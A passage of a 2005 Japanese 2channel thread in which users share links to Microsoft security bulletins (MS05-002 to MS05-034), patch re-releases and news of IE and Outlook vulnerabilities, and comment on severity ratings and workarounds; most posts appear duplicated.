http://japan.cnet.com/news/sec/story/0,2000050480,20082248,00.htm
>Microsoftは、1月にリリースしたWindows 98/ME用のセキュリティパッチに欠陥があり、
>これらのオペレーティングシステム(OS)が動作するシステムが攻撃を受けるおそれがあることを認めた。
906 :名無しさん@お腹いっぱい。:皇紀2665/04/01(金) 14:25:41
>>905
記事中には「1月に出た」MS05-002とあるが、Windows 98/ME用MS05-002パッチは3/9にリリースされている。
参考:KB891711不具合報告
緊急! WindowsUpdateをしましょう!
http://pc8.2ch.net/test/read.cgi/sec/1060956936/919-
記事中には「1月に出た」MS05-002とあるが、Windows 98/ME用MS05-002パッチは3/9にリリースされている。
参考:KB891711不具合報告
緊急! WindowsUpdateをしましょう!
http://pc8.2ch.net/test/read.cgi/sec/1060956936/919-
907 :名無しさん@お腹いっぱい。:2005/04/05(火) 09:28:42
米eEyeがIEやOutlookのセキュリティ・ホールを発見,詳細については未公表
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050404/158433/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050404/158433/
908 :名無しさん@お腹いっぱい。:2005/04/05(火) 13:27:56
909 :名無しさん@お腹いっぱい。:2005/04/08(金) 18:15:14
4月の月例パッチは“緊急”を含む8件、ウイルス駆除ツールも更新
http://internet.watch.impress.co.jp/cda/news/2005/04/08/7193.html
>米国時間の12日
いつものことだけど日本だと水曜日ですね ウキウキ(はしないか)
http://internet.watch.impress.co.jp/cda/news/2005/04/08/7193.html
>米国時間の12日
いつものことだけど日本だと水曜日ですね ウキウキ(はしないか)
910 :名無しさん@お腹いっぱい。:2005/04/13(水) 13:28:42
【緊急】
MS05-019 - TCP/IP の脆弱性により、リモートでコードが実行され、サービス拒否が起こる (893066)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-019.mspx
【緊急】
MS05-020 - Internet Explorer 用の累積的なセキュリティ更新プログラム (890923)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-020.mspx
【緊急】
MS05-021 - Exchange Server の脆弱性により、リモートでコードが実行される (894549)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-021.mspx
【緊急】
MS05-022 - MSN Messenger の脆弱性により、リモートでコードが実行される (896597)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-022.mspx
【緊急】
MS05-23 - Microsoft Word の脆弱性により、リモートでコードが実行される(890169)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-023.mspx
【重要】
MS05-016 - Windows シェルの脆弱性により、リモートでコードが実行される (893086)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-016.mspx
【重要】
MS05-017 - メッセージ キューの脆弱性により、コードが実行される(892944)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-017.mspx
【重要】
MS05-018 - Windows Kernel の脆弱性により、特権の昇格およびサービス拒否がおこる (890859)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-018.mspx
MS05-019 - TCP/IP の脆弱性により、リモートでコードが実行され、サービス拒否が起こる (893066)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-019.mspx
【緊急】
MS05-020 - Internet Explorer 用の累積的なセキュリティ更新プログラム (890923)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-020.mspx
【緊急】
MS05-021 - Exchange Server の脆弱性により、リモートでコードが実行される (894549)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-021.mspx
【緊急】
MS05-022 - MSN Messenger の脆弱性により、リモートでコードが実行される (896597)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-022.mspx
【緊急】
MS05-23 - Microsoft Word の脆弱性により、リモートでコードが実行される(890169)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-023.mspx
【重要】
MS05-016 - Windows シェルの脆弱性により、リモートでコードが実行される (893086)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-016.mspx
【重要】
MS05-017 - メッセージ キューの脆弱性により、コードが実行される(892944)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-017.mspx
【重要】
MS05-018 - Windows Kernel の脆弱性により、特権の昇格およびサービス拒否がおこる (890859)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-018.mspx
911 :名無しさん@お腹いっぱい。:2005/04/13(水) 13:31:31
【緊急】
カーソルおよびアイコンのフォーマットの処理の脆弱性により、リモートでコードが実行される (891711) (MS05-002)
セキュリティ情報 MS05-002 を更新しました。
Windows 98、Windows 98 Second Edition および Windows Millennium Edition 用
の新しいセキュリティ更新プログラムが利用可能になりました。
既に公開済みの他の OS 用の更新プログラムに変更はありません。
http://www.microsoft.com/japan/technet/security/bulletin/MS05-002.mspx
↑不具合情報のあった98,98SE,ME用の891711修正パッチのの修正版キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
【緊急】
PNG 処理の脆弱性により、バッファオーバーランが起こる (890261) (MS05-009)
Microsoft Windows Messenger version 4.7.0.2009 (Windows XP Service Pack 1 で実行されている場合) 用
の更新パッケージが利用可能になりました。
http://www.microsoft.com/japan/technet/security/bulletin/MS05-009.mspx
カーソルおよびアイコンのフォーマットの処理の脆弱性により、リモートでコードが実行される (891711) (MS05-002)
セキュリティ情報 MS05-002 を更新しました。
Windows 98、Windows 98 Second Edition および Windows Millennium Edition 用
の新しいセキュリティ更新プログラムが利用可能になりました。
既に公開済みの他の OS 用の更新プログラムに変更はありません。
http://www.microsoft.com/japan/technet/security/bulletin/MS05-002.mspx
↑不具合情報のあった98,98SE,ME用の891711修正パッチのの修正版キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
【緊急】
PNG 処理の脆弱性により、バッファオーバーランが起こる (890261) (MS05-009)
Microsoft Windows Messenger version 4.7.0.2009 (Windows XP Service Pack 1 で実行されている場合) 用
の更新パッケージが利用可能になりました。
http://www.microsoft.com/japan/technet/security/bulletin/MS05-009.mspx
912 :名無しさん@お腹いっぱい。:2005/04/15(金) 10:51:07
WindowsやIE,Oracleのセキュリティ・ホールを突くコードがさっそく出回る
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050414/159277/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050414/159277/
913 :名無しさん@お腹いっぱい。:2005/04/15(金) 13:21:39
深刻度格付けは確か「情報初公開時の」だったはずだから
その時点では攻撃コードがないってことで「重要」になってても
パッチを逆アセンブルされるのかすぐ実質「緊急」クラスに昇格することが多いな
知られてないセキュリティホールのパッチは確かに考えもんだわ
そんな言い訳でもう攻撃コードあるのまで放置されそうだけどw
その時点では攻撃コードがないってことで「重要」になってても
パッチを逆アセンブルされるのかすぐ実質「緊急」クラスに昇格することが多いな
知られてないセキュリティホールのパッチは確かに考えもんだわ
そんな言い訳でもう攻撃コードあるのまで放置されそうだけどw
914 :名無しさん@お腹いっぱい。:2005/04/21(木) 22:37:51
Microsoft UpdateとWSUSは6月にリリースの予定
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050421/1/
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050421/1/
915 :名無しさん@お腹いっぱい。:2005/04/22(金) 11:22:34
916 :名無しさん@お腹いっぱい。:2005/05/09(月) 22:41:29
米eEyeがIEなどのセキュリティ・ホールを再び発見,深刻度は「高」
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050509/160520/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050509/160520/
917 :名無しさん@お腹いっぱい。:2005/05/11(水) 08:35:44
「Web の表示」の脆弱性により、リモートでコードが実行される (894320) (MS05-024)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-024.mspx
最大深刻度 : 重要
http://www.microsoft.com/japan/technet/security/bulletin/ms05-024.mspx
最大深刻度 : 重要
918 :名無しさん@お腹いっぱい。:2005/05/11(水) 08:43:46
>>917
○影響を受けるソフトウェア :
Microsoft Windows 2000 Service Pack 3 および Microsoft Windows 2000 Service Pack 4
※Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE)、Microsoft Windows Millennium Edition (ME)
※「緊急」以外のセキュリティ問題のための更新プログラムは提供されません。
○影響を受けないソフトウェア :
Microsoft Windows XP Service Pack 1 および Microsoft Windows XP Service Pack 2
Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)
Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 および Windows Server 2003 Service Pack 1
Microsoft Windows Server 2003 for Itanium-based Systems および Service Pack 1 を適用した Microsoft Windows Server 2003 for Itanium-based Systems
Microsoft Windows Server 2003 x64 Edition
上記のソフトウェアのテストを行い、この脆弱性による影響を評価しました。それより前のバージョンに関してはサポートの対象となっていないため、この脆弱性による影響は不明です。
http://www.microsoft.com/japan/technet/security/bulletin/ms05-024.mspx
○影響を受けるソフトウェア :
Microsoft Windows 2000 Service Pack 3 および Microsoft Windows 2000 Service Pack 4
※Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE)、Microsoft Windows Millennium Edition (ME)
※「緊急」以外のセキュリティ問題のための更新プログラムは提供されません。
○影響を受けないソフトウェア :
Microsoft Windows XP Service Pack 1 および Microsoft Windows XP Service Pack 2
Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)
Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 および Windows Server 2003 Service Pack 1
Microsoft Windows Server 2003 for Itanium-based Systems および Service Pack 1 を適用した Microsoft Windows Server 2003 for Itanium-based Systems
Microsoft Windows Server 2003 x64 Edition
上記のソフトウェアのテストを行い、この脆弱性による影響を評価しました。それより前のバージョンに関してはサポートの対象となっていないため、この脆弱性による影響は不明です。
http://www.microsoft.com/japan/technet/security/bulletin/ms05-024.mspx
919 :名無しさん@お腹いっぱい。:2005/05/11(水) 08:50:35
Windows 2000用修正パッチが公開,既知の「重要」セキュリティ・ホールをふさぐ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050511/160620/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050511/160620/
920 :名無しさん@お腹いっぱい。:2005/05/11(水) 15:51:13
>>919
>「従来のWindowsフォルダを使う」に設定変更して回避する
Win98,98SE,MEはパッチもないし今後は↑しかないわけだ
なんか穴が見つかって回避策するたびにちょっとずつ不便になって
最終的に知里も積もれば状態になってるような気がするのは漏れだけ?
>「従来のWindowsフォルダを使う」に設定変更して回避する
Win98,98SE,MEはパッチもないし今後は↑しかないわけだ
なんか穴が見つかって回避策するたびにちょっとずつ不便になって
最終的に知里も積もれば状態になってるような気がするのは漏れだけ?
921 :名無しさん@お腹いっぱい。:2005/05/11(水) 17:55:38
従来のWindowsフォルダなんか不便で使えんぞ。
どうにかしてくれよな。
どうにかしてくれよな。
922 :名無しさん@お腹いっぱい。:2005/05/13(金) 19:32:56
セキュリティアドバイザリいくら試験公開版だからってMSサイト内からたどりつけなかったw
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050511/160680/
http://www.microsoft.com/japan/technet/security/advisory/892313.mspx
>これはセキュリティ上の脆弱性ではありません。しかし、この更新プログラムは、悪質な Web サイトにアクセスさせられてしまうかもしれないユーザーに対して、追加の警告を促すために発行されました。
びっみょー
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050511/160680/
http://www.microsoft.com/japan/technet/security/advisory/892313.mspx
>これはセキュリティ上の脆弱性ではありません。しかし、この更新プログラムは、悪質な Web サイトにアクセスさせられてしまうかもしれないユーザーに対して、追加の警告を促すために発行されました。
びっみょー
Intelのハイパースレッディングに深刻な脆弱性
http://www.itmedia.co.jp/enterprise/articles/0505/14/news009.html
http://www.itmedia.co.jp/enterprise/articles/0505/14/news009.html
924 :名無しさん@お腹いっぱい。:2005/05/15(日) 00:53:15
IEとOutlookに未パッチの脆弱性、eEyeが概略公開
http://www.itmedia.co.jp/enterprise/articles/0505/14/news010.html
http://www.itmedia.co.jp/enterprise/articles/0505/14/news010.html
925 :名無しさん@お腹いっぱい。:2005/06/02(木) 11:25:16
IEに強制終了させられるセキュリティ・ホール,危険性は小さい
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050601/161972/
Windows 2000向けパッチ集「Update Rollup 1」が6月1日に登場
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050530/2/
まだかな?
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050601/161972/
Windows 2000向けパッチ集「Update Rollup 1」が6月1日に登場
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050530/2/
まだかな?
926 :名無しさん@お腹いっぱい。:2005/06/02(木) 12:40:19
> Windows 2000向けパッチ集「Update Rollup 1」が6月1日に登場
> http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050530/2/
> まだかな?
それ英語版でしょ
> http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050530/2/
> まだかな?
それ英語版でしょ
927 :名無しさん@お腹いっぱい。:2005/06/02(木) 12:53:04
>>926
日本語版も時間差ほとんどないと思うよ。
>2005 年半ばに Windows 2000 Service Pack 4 (SP4) 対応の更新プログラムのロールアップの提供を予定しています。
http://www.microsoft.com/japan/windows2000/server/evaluation/news/bulletins/rollup.asp
日本語版も時間差ほとんどないと思うよ。
>2005 年半ばに Windows 2000 Service Pack 4 (SP4) 対応の更新プログラムのロールアップの提供を予定しています。
http://www.microsoft.com/japan/windows2000/server/evaluation/news/bulletins/rollup.asp
928 :名無しさん@お腹いっぱい。:2005/06/02(木) 13:22:29
>>925-927
近々2kを再インスコする予定なので有難い。
近々2kを再インスコする予定なので有難い。
929 :名無しさん@お腹いっぱい。:2005/06/06(月) 10:05:28
930 :名無しさん@お腹いっぱい。:2005/06/06(月) 15:04:10
[IE] 画像ファイルのドラッグ&ドロップのキャンセルによりメモリリーク
http://support.microsoft.com/default.aspx?scid=kb;ja;900856
http://support.microsoft.com/default.aspx?scid=kb;ja;900856
931 :名無しさん@お腹いっぱい。:2005/06/08(水) 17:32:13
セキュ板のWUスレがおちてるのでここにカキコ
マイクロソフト、「Windows Update v6」への段階的移行を公表
http://internet.watch.impress.co.jp/cda/news/2005/06/07/7921.html
ところでちょっと早いけどここの次スレどうする?
「IE5・5と6・0、ネット閲覧ソフトに欠陥」の次スレも全部まとめて
(つーか住人かなりかぶってるだろw)
「MSソフトのセキュリティ対策スレ」
でよくない?
マイクロソフト、「Windows Update v6」への段階的移行を公表
http://internet.watch.impress.co.jp/cda/news/2005/06/07/7921.html
ところでちょっと早いけどここの次スレどうする?
「IE5・5と6・0、ネット閲覧ソフトに欠陥」の次スレも全部まとめて
(つーか住人かなりかぶってるだろw)
「MSソフトのセキュリティ対策スレ」
でよくない?
932 :名無しさん@お腹いっぱい。:2005/06/08(水) 20:24:29
ちょっと広いやうな奇ガス
できれば純正メーラーで欲しいけんど…
人居ないしどうしたもんか
できれば純正メーラーで欲しいけんど…
人居ないしどうしたもんか
933 :名無しさん@お腹いっぱい。:2005/06/10(金) 16:48:27
今月の定期便は緊急もあるそうですよ
http://www.itmedia.co.jp/enterprise/articles/0506/10/news032.html
http://www.itmedia.co.jp/enterprise/articles/0506/10/news032.html
934 :名無しさん@お腹いっぱい。:2005/06/10(金) 22:50:10
「6月に公開するセキュリティ情報は10件,『緊急』を含む」――マイクロソフトが予告
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050610/162551/
>>931
同意
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050610/162551/
>>931
同意
935 :名無しさん@お腹いっぱい。:2005/06/11(土) 16:21:36
「修正プログラムの検証には数週間必要」――米MSのセキュリティ担当ディレクタ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050526/161567/
まぁ検証の方がよっぽど手間かかるのは確かだろうけどさ・・・
Windowsで稼いだ利益わけわかんないところに激回すぐらいなら
社内テスト環境もっと増やして並列度あげてくれよ・・・
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050526/161567/
まぁ検証の方がよっぽど手間かかるのは確かだろうけどさ・・・
Windowsで稼いだ利益わけわかんないところに激回すぐらいなら
社内テスト環境もっと増やして並列度あげてくれよ・・・
936 :名無しさん@お腹いっぱい。:2005/06/13(月) 12:03:01
IE7の動作モードに関して開発者がブログに書き込み
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050613/3/
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050613/3/
937 :名無しさん@お腹いっぱい。:2005/06/14(火) 15:03:33
>>934
いよいよ明日(日本時間)だね
いよいよ明日(日本時間)だね
938 :キタ━━━━━━(゚∀゚)━━━━━━ !!!!! :2005/06/15(水) 08:41:12
【緊急】
MS05-025 - Internet Explorer 用の累積的なセキュリティ更新プログラム (883939)
http://go.microsoft.com/?linkid=3305271
【緊急】
MS05-026 - HTML ヘルプの脆弱性により、リモートでコードが実行される (896358)
http://go.microsoft.com/?linkid=3305272
【緊急】
MS05-027 - サーバー メッセージ ブロックの脆弱性により、リモートでコードが実行される (896422)
http://go.microsoft.com/?linkid=3305273
【重要】
MS05-028 - WebClient サービスの脆弱性により、リモートでコードが実行される (896426)
http://go.microsoft.com/?linkid=3305274
【重要】
MS05-29 - Exchange Server 5.5 の Outlook Web Access の脆弱性により、クロスサイト スクリプティング攻撃が行われる (895179)
http://go.microsoft.com/?linkid=3305275
【重要】
MS05-030 - Outlook Express 用の累積的なセキュリティ更新プログラム (897715)
http://go.microsoft.com/?linkid=3305276
【重要】
MS05-031 - ステップ バイ ステップの対話型トレーニングの脆弱性により、リモートでコードが実行される (898458)
http://go.microsoft.com/?linkid=3305277
【警告】
MS05-032 - Microsoft エージェントの脆弱性により、なりすましが行われる (890046)
http://go.microsoft.com/?linkid=3305278
【警告】
MS05-033 - Telnet クライアントの脆弱性により、情報漏えいが起こる (896428)
http://go.microsoft.com/?linkid=3305279
【警告】
MS05-034 - ISA Server 2000 用の累積的なセキュリティ更新プログラム (899753)
http://go.microsoft.com/?linkid=3305280
MS05-025 - Internet Explorer 用の累積的なセキュリティ更新プログラム (883939)
http://go.microsoft.com/?linkid=3305271
【緊急】
MS05-026 - HTML ヘルプの脆弱性により、リモートでコードが実行される (896358)
http://go.microsoft.com/?linkid=3305272
【緊急】
MS05-027 - サーバー メッセージ ブロックの脆弱性により、リモートでコードが実行される (896422)
http://go.microsoft.com/?linkid=3305273
【重要】
MS05-028 - WebClient サービスの脆弱性により、リモートでコードが実行される (896426)
http://go.microsoft.com/?linkid=3305274
【重要】
MS05-29 - Exchange Server 5.5 の Outlook Web Access の脆弱性により、クロスサイト スクリプティング攻撃が行われる (895179)
http://go.microsoft.com/?linkid=3305275
【重要】
MS05-030 - Outlook Express 用の累積的なセキュリティ更新プログラム (897715)
http://go.microsoft.com/?linkid=3305276
【重要】
MS05-031 - ステップ バイ ステップの対話型トレーニングの脆弱性により、リモートでコードが実行される (898458)
http://go.microsoft.com/?linkid=3305277
【警告】
MS05-032 - Microsoft エージェントの脆弱性により、なりすましが行われる (890046)
http://go.microsoft.com/?linkid=3305278
【警告】
MS05-033 - Telnet クライアントの脆弱性により、情報漏えいが起こる (896428)
http://go.microsoft.com/?linkid=3305279
【警告】
MS05-034 - ISA Server 2000 用の累積的なセキュリティ更新プログラム (899753)
http://go.microsoft.com/?linkid=3305280
939 :名無しさん@お腹いっぱい。:2005/06/15(水) 08:43:19
マイクロソフト セキュリティ情報 MS02-035 更新
公開日: 2002/07/11
更新日: 2005/06/15
http://go.microsoft.com/?linkid=3305567
マイクロソフト セキュリティ情報 MS05-004 更新
公開日: 2005/02/09
更新日: 2005/06/15
http://go.microsoft.com/?linkid=3305576
マイクロソフト セキュリティ情報 MS05-019 更新
公開日: 2005/04/13
更新日: 2005/06/15
http://go.microsoft.com/?linkid=3305585
公開日: 2002/07/11
更新日: 2005/06/15
http://go.microsoft.com/?linkid=3305567
マイクロソフト セキュリティ情報 MS05-004 更新
公開日: 2005/02/09
更新日: 2005/06/15
http://go.microsoft.com/?linkid=3305576
マイクロソフト セキュリティ情報 MS05-019 更新
公開日: 2005/04/13
更新日: 2005/06/15
http://go.microsoft.com/?linkid=3305585
940 :名無しさん@お腹いっぱい。:2005/06/15(水) 08:53:50
関連スレ(Win板)。人柱報告なども下記参照。
Windows updateしたときに上げるスレ 20
http://pc8.2ch.net/test/read.cgi/win/1113469880/l50
Windows Update失敗したらageるスレ 8
http://pc8.2ch.net/test/read.cgi/win/1115080461/l50
Windows updateしたときに上げるスレ 20
http://pc8.2ch.net/test/read.cgi/win/1113469880/l50
Windows Update失敗したらageるスレ 8
http://pc8.2ch.net/test/read.cgi/win/1115080461/l50
941 :名無しさん@お腹いっぱい。:2005/06/15(水) 10:57:03
WindowsやIEに複数の危険なセキュリティ・ホール,パッチの適用が急務
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050615/162727/
4月に公開されたWindowsのパッチが再リリース,ネットワーク接続に関する問題を解消
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050615/162734/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050615/162727/
4月に公開されたWindowsのパッチが再リリース,ネットワーク接続に関する問題を解消
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050615/162734/
942 :名無しさん@お腹いっぱい。:2005/06/19(日) 15:26:22
【PC診断士】
http://pc.ai2you.com/PCshindanshi/index.asp
※無料のIDを作成する必要があります。
@ブラウザの安全度を無料診断できます。
ノートン入れてるのにセキュリティは中の下でした。
ぶっちゃけ参考になりません。誰がやっても同じ結果(低い結果)になるんじゃないの??
みんなも試してみよう!
APCのクリーン度をチェックする。
こちらの方が人気ありますね。
ウホッ!結果よろしく。
http://pc.ai2you.com/PCshindanshi/index.asp
※無料のIDを作成する必要があります。
@ブラウザの安全度を無料診断できます。
ノートン入れてるのにセキュリティは中の下でした。
ぶっちゃけ参考になりません。誰がやっても同じ結果(低い結果)になるんじゃないの??
みんなも試してみよう!
APCのクリーン度をチェックする。
こちらの方が人気ありますね。
ウホッ!結果よろしく。
943 :名無しさん@お腹いっぱい。:2005/06/19(日) 18:26:26
>>942
IEでActiveXを許可する時点で何でもできる環境与えているのに
安全度調査も何もないだろ。
前提条件が駄目すぎる。
クリーン度調査も、ネットでやるなよ。
レジストリからドライブの中身の調査だろ
怖くて、俺にはできん。
IEでActiveXを許可する時点で何でもできる環境与えているのに
安全度調査も何もないだろ。
前提条件が駄目すぎる。
クリーン度調査も、ネットでやるなよ。
レジストリからドライブの中身の調査だろ
怖くて、俺にはできん。
944 :名無しさん@お腹いっぱい。:2005/06/19(日) 19:00:38
>>943
おっしゃるとおりで・・・w
おっしゃるとおりで・・・w
945 :名無しさん@お腹いっぱい。:2005/06/19(日) 19:09:52
えらく登録情報詳しく聞いてくんのね
946 :名無しさん@お腹いっぱい。:2005/06/19(日) 19:11:28
ですね。
もっぱら僕は架空の氏名・住所の捨てIDですが。
もっぱら僕は架空の氏名・住所の捨てIDですが。
947 :名無しさん@お腹いっぱい。:2005/06/20(月) 22:20:46
「Outlook Express」に存在する複数不具合を修正するWindows XP SP2用パッチ
http://www.forest.impress.co.jp/article/2005/06/20/oebugfix.html
http://www.forest.impress.co.jp/article/2005/06/20/oebugfix.html
948 :名無しさん@お腹いっぱい。:2005/06/21(火) 10:07:24
マイクロソフト,Windows Updateの新版v6への移行を明らかに
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050620/4/
>クライアントPCの移行は自動的で,移行期間中または,移行期間後にユーザーがWindows Updateサイトへアクセスした際に,
>Windows Update v6用クライアント・プログラムの導入プロセスが行われるという(該当サイトhttp://support.microsoft.com/default.aspx?scid=kb;ja;899789)。
>「自動更新」機能を有効にしている場合は,自動的に切り替わるという。
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050620/4/
>クライアントPCの移行は自動的で,移行期間中または,移行期間後にユーザーがWindows Updateサイトへアクセスした際に,
>Windows Update v6用クライアント・プログラムの導入プロセスが行われるという(該当サイトhttp://support.microsoft.com/default.aspx?scid=kb;ja;899789)。
>「自動更新」機能を有効にしている場合は,自動的に切り替わるという。
949 :名無しさん@お腹いっぱい。:2005/06/21(火) 23:24:28
IEやFirefox,Operaなどにダイアログ・ボックスの発行元を偽装されるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050621/163100/
次スレの案出してくだされ。>ALL
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050621/163100/
次スレの案出してくだされ。>ALL
950 :名無しさん@お腹いっぱい。:2005/06/21(火) 23:26:13
>>949
>Operaは最新版の8.01では修正されている。他のブラウザは,6月21日時点でパッチは提供されていない。
>Operaは最新版の8.01では修正されている。他のブラウザは,6月21日時点でパッチは提供されていない。
951 :奈々氏戦隊五連者正特別行動隊推参 ◆.McrvIPr4A :2005/06/22(水) 00:17:37
ふ〜ン。
952 :名無しさん@お腹いっぱい。:2005/06/27(月) 10:25:18
米Microsoft,IEのぜい弱性を認めるものの対策パッチは提供せず
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050627/2/
>同社によれば,この欠陥は実際にはバグではなく,仕様の1つであり,それはIEがWeb標準に従っているからだという。
>「これは現在の標準的なWebブラウザの機能がフィッシング攻撃に使えるという1つの例だ」と同社はある声明文で指摘した。
おいおい。
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050627/2/
>同社によれば,この欠陥は実際にはバグではなく,仕様の1つであり,それはIEがWeb標準に従っているからだという。
>「これは現在の標準的なWebブラウザの機能がフィッシング攻撃に使えるという1つの例だ」と同社はある声明文で指摘した。
おいおい。
953 :名無しさん@お腹いっぱい。:2005/06/27(月) 15:30:06
マイクロソフト セキュリティ アドバイザリ (902333)
元の場所が表示されないブラウザ ウィンドウがフィッシング詐欺に利用される可能性について 公開日: 2005年6月21日
http://www.microsoft.com/japan/technet/security/advisory/902333.mspx
元の場所が表示されないブラウザ ウィンドウがフィッシング詐欺に利用される可能性について 公開日: 2005年6月21日
http://www.microsoft.com/japan/technet/security/advisory/902333.mspx
954 :名無しさん@お腹いっぱい。:2005/06/28(火) 01:35:07
トップダウン方式をやめないかぎり技術の進歩とセキュリティは相反するものの
ように見えるかもしれない。アクセスしようとするところに鍵を懸けず、
そこへ行く道を塞いでいる。私達の行く手を制限している。
新しい技術は、そこへ行く新しい道を作り出す。
ように見えるかもしれない。アクセスしようとするところに鍵を懸けず、
そこへ行く道を塞いでいる。私達の行く手を制限している。
新しい技術は、そこへ行く新しい道を作り出す。
955 :名無しさん@お腹いっぱい。:2005/06/28(火) 11:45:26
「Outlook Expressのセキュリティ・ホールへの攻撃コードが出現」――米CERT/CC
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050627/163391/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050627/163391/
956 :名無しさん@お腹いっぱい。:2005/06/29(水) 09:56:55
■Windows 2000 SP4 用の更新プログラム ロールアップ 1
http://www.microsoft.com/downloads/details.aspx?FamilyID=c0a2ca36-1179-431c-80e6-60a494d3823d&DisplayLang=ja
認証が必要だが、現在のところ認証をパスしてもダウンロードできる。
Windows 2000 SP4 のロールアップ 1 を更新します。(機械翻訳)
http://support.microsoft.com/kb/891861
>この更新ロールアップは、 Windows 2000 SP4 のリリースと2005年4月30日の間の Windows 2000 で生成されたセキュリティ関連更新の一覧です。
なので、Windows 2000 SP4 + RP1に2005年5月と6月のアップデートを適用する必要がある。
■Windows XP 用の更新プログラム (KB898461)
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=50c334e1-9a67-4b99-a65a-069b79267856
認証が必要だが、現在のところ認証をパスしてもダウンロードできる。
ソフトウェアの更新 898461 がバージョン 6.1.22.4 の パッケージ インストーラの Windows の固定コピーをインストールします。(機械翻訳)
http://support.microsoft.com/kb/898461
http://www.microsoft.com/downloads/details.aspx?FamilyID=c0a2ca36-1179-431c-80e6-60a494d3823d&DisplayLang=ja
認証が必要だが、現在のところ認証をパスしてもダウンロードできる。
Windows 2000 SP4 のロールアップ 1 を更新します。(機械翻訳)
http://support.microsoft.com/kb/891861
>この更新ロールアップは、 Windows 2000 SP4 のリリースと2005年4月30日の間の Windows 2000 で生成されたセキュリティ関連更新の一覧です。
なので、Windows 2000 SP4 + RP1に2005年5月と6月のアップデートを適用する必要がある。
■Windows XP 用の更新プログラム (KB898461)
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=50c334e1-9a67-4b99-a65a-069b79267856
認証が必要だが、現在のところ認証をパスしてもダウンロードできる。
ソフトウェアの更新 898461 がバージョン 6.1.22.4 の パッケージ インストーラの Windows の固定コピーをインストールします。(機械翻訳)
http://support.microsoft.com/kb/898461
957 :名無しさん@お腹いっぱい。:2005/06/30(木) 15:10:57
最近outbound方向でsvchostが変なリクエストしだすと思ったら
どうも自動更新がMS以外にもつなごうとするらしい
(無効にするとMBSA1.2から「リスク大」判定しやがるんでめんどーだから通知だけさせとく設定にしてたのよ)
WMP10もフルモードのまま起動するといろんな(音楽配信系?)とこにつなごうとするし
これ新しい流行なのかな?
どうも自動更新がMS以外にもつなごうとするらしい
(無効にするとMBSA1.2から「リスク大」判定しやがるんでめんどーだから通知だけさせとく設定にしてたのよ)
WMP10もフルモードのまま起動するといろんな(音楽配信系?)とこにつなごうとするし
これ新しい流行なのかな?
958 :名無しさん@お腹いっぱい。:2005/07/01(金) 20:41:46
豪セキュリティ企業がIEの問題を指摘、Microsoftも「調査を進めている」
http://internet.watch.impress.co.jp/cda/news/2005/07/01/8252.html
>オーストラリアのセキュリティベンダーであるSEC Consultは6月29日、Internet Explorer(IE)に
>ヒープオーバーフローが発生する恐れがあると警告した。これを受けて米Microsoftは30日、Security
>Advisory(903144)として調査を進めていることを公表した。
http://internet.watch.impress.co.jp/cda/news/2005/07/01/8252.html
>オーストラリアのセキュリティベンダーであるSEC Consultは6月29日、Internet Explorer(IE)に
